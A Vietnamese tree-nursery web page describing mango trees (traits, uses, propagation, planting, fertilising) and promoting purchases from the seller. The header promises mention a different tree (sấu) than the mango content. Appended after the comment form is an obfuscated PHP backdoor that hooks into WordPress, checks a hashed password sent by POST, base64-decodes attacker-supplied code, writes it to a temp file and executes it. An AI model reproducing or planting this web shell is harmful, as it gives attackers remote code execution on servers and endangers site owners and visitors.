Giá cây xoài chuẩn nhất 2019 – Bảo hành 3-6 tháng toàn quốc

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Là một loại cây ăn quả phổ biến trên cả nước, cây xoài được rất nhiều người yêu thích. Và bạn muốn mua một cây xoài về nhà nhưng lại không biết giá cây xoài trong năm 2019 này? Hãy để vuoncayhoabinh.com giải đáp giúp bạn thắc mắc đó.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

Giới thiệu về cây xoài

 

Được trồng phổ biến ở nhiều nơi trên thế giới với sự đa dạng về mẫu mã, kiểu loại cũng như mùi vị, xoài rất được ưa chuộng. Đây là loại cây rất đa năng. Vừa có thể làm cảnh, vừa có thể cho bóng mát lại là cây ăn quả nữa.

 

Đặc điểm của cây xoài

 

Xoài là cây thân gỗ, có chiều cao đa dạng. Có những cây xoài rất thấp chỉ khoảng hơn 2-3m. Nhưng cũng có những cây xoài cao đến 15-20m. Xoài thích mọc ở những nơi rộng rãi, thoáng đãng để tán cây có thể phát triển tốt.

 

Phần rễ lớn của xoài phần bố trong tầng đất khoảng từ 0-50cm. Nó tập trung chủ yếu trong phạm vi cách gốc cây khoảng 2m. Bộ rễ rất khoẻ giúp cây bám chắc trong đấy và hút chất dinh dưỡng nuôi cây.

 

Lá xoài to, mọc so le với nhau. Mặt trên của lá có màu xanh đậm, còn mặt dưới thì màu nhạt hơn. Lá của xoài dài, từ khoảng 15-30 cm và có độ rộng 3-7cm. Mỗi cây xoài một năm có thể ra đến 3 đợt chồi tuỳ theo giống và tuổi của cây.

 

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

Lá non mới mọc có màu tím xanh và tương đối mềm, nhẵn. Phải sau 35 ngày mới có thể chuyển sang màu xanh hoàn toàn. Hoa xoài mọc theo chùm, dài khoảng 30cm. Gồm những bông hoa nhỏ, màu vàng nhạt.

 

Trên chùm hoa có hai loại lưỡng tính và hoa đực. Xoài thuộc giống cây thụ phấn chéo. Nhờ đến côn trùng để thụ phấn.

 

Quả xoài có kích thước tương đối lớn, trừ xoài mít có kích thước nhỏ. Có dạng hình hạch, dẹt, thân dài và khi xanh thì cứng. Trên xoài có những sợi thớ mà khi nào gặp đất nảy mầm thì mới mở ra.

 

Xoài có hai loại mùi vị chính. Đó là xoài chua và xoài ngọt. Dù chua được dùng trong các món ăn kèm hoặc được cắt nhỏ ra chấm muối ớt rất ngon.

 

Còn xoài ngọt lại có hương vị ngọt ngào, thanh mát, khiến rất nhiều người yêu thích. Bởi vậy mà xoài được xem là loại quả quý.

 

Chức năng và công dụng của cây xoài

 

Bên cạnh chức năng vô cùng được yêu thích là cây ăn quả, xoài còn có rất nhiều công dụng hữu ích khác. Xoài được chọn làm cây trồng bóng mát. Bởi những tán lá rộng của mình, xoài thường xuyên được trồng để đem đến một không gian thoáng mát cho sân vườn nhà bạn.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

Đây thậm chí còn được làm cây cảnh bởi vẻ đẹp giản dị của nó. Những chùm hoa nhỏ xinh rủ xuống. Những chùm quả sai trĩu, nặng trịch kéo cành rũ xuống. Những chiếc lá xanh xanh. Những thứ đó đã khiến xoài được không ít người lựa chọn làm cây cảnh.

 

Vẫn chưa hết đâu, xoài còn là một loại cây chống bào mòn vô cùng tốt. Rễ cây khoẻ mạnh, lan rộng và bám sâu vào trong đất, vô hình chung giúp khoảng đất đó không dễ dàng gì bị xói mòn. Bởi thế mà đây là loại cây phòng hộ rất tốt.

 

Nhân giống cây xoài

 

Xoài được nhân giống bằng cách gieo hạt. Mỗi một vùng lại phù hợp với những loại xoài khác nhau. Bởi vậy khi lựa chọn gieo hạt, chọn những loại hạt giống phù hợp. Có như vậy năng suất mới cao, chất lượng của xoài cũng cao hơn.

 

Khi tiến hành gieo hạt, cần phải đập vỡ vỏ để hạt nhanh chóng nảy mầm. Mỗi một hạt xoài có thế mọc rất nhiều cây. Khi đó có thể lựa chọn cây xoài mạnh nhất, khoẻ nhất để trồng.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

 

Bên cạnh cách đó, có nhiều người dùng phương pháp ghép xoài để có thể thu được kết quả nhanh chóng. Ghép các mắt xoài lên trên gốc cây xoài. Sử dụng cách ghép mắt hoặc ghép đoạn cành đều được.

 

Cách trồng cây xoài

 

Đào một hố lớn, có độ sâu và đường kính đủ rộng khoảng 40-50cm. Khoảng cách giữa hai cây khoảng 6-15m còn tuỳ vào từng loại cây. Sau khi trồng cây xuống, cần phải bón 20-30kg phân. Nếu đất thuộc đất chuyển đổi thì nên bón thêm 0,5 đến 1kg nữa. Đồng thời bổ sung thêm 0,5-1kg vôi bột để lấy lại sự tơi xốp của đất.

 

Khi bắt đầu trưởng thành, vẫn tiếp tục duy trì bón phân NPK theo tỉ lệ lần lượt là 10:10:20 và tăng dần để cây có lượng dinh dưỡng cần thiết cho việc ra hoa và kết trái. Mỗi năm nên bón hai lần vào lúc bắt đầu ra hoa và sau khi thu hoạch.

 

Giá cây xoài 2019

 

Xoài có rất nhiều loại, như xoài tượng, xoài thanh la, xoài cát, xoài mít,… Bởi lẽ vậy mà giá cả của xoài cũng đa dạng chứ không tập trung trong một giá nào cụ thể. Với mỗi loại xoài khác nhau cũng như độ trưởng thành của cây khác nhau sẽ có những giá khác nhau. Vậy câu hỏi được đặt ra đó là Đâu là nơi bán cây xoài giá chuẩn nhất 2019.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

Nếu bạn có hứng thú mua xoài, hãy truy cập vào Vườn cây Hòa Bình để nhận được những tư vấn chính xác nhất về giá cả của từng loại cây xoài.

 

Trên đây, vuoncayhoabinh.com đã cung cấp cho mọi người những thông tin hữu ích về cây xoài. Từ đặc điểm, công dụng đến giá cây xoài. Hy vọng nó sẽ có ích cho các bạn. Nếu có thắc mắc nào, đừng ngần ngại, hãy liên lạc ngay với chúng tôi để nhận được những tư vấn nhiệt tình nhất. Tại đây còn có rất nhiều loại cây công trình, cây xanh đô thị, cây bóng mát, cây phong thủy,… khác mà bạn có thể tham khảo, cân nhắc mua về cho sân vườn nhà mình.

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}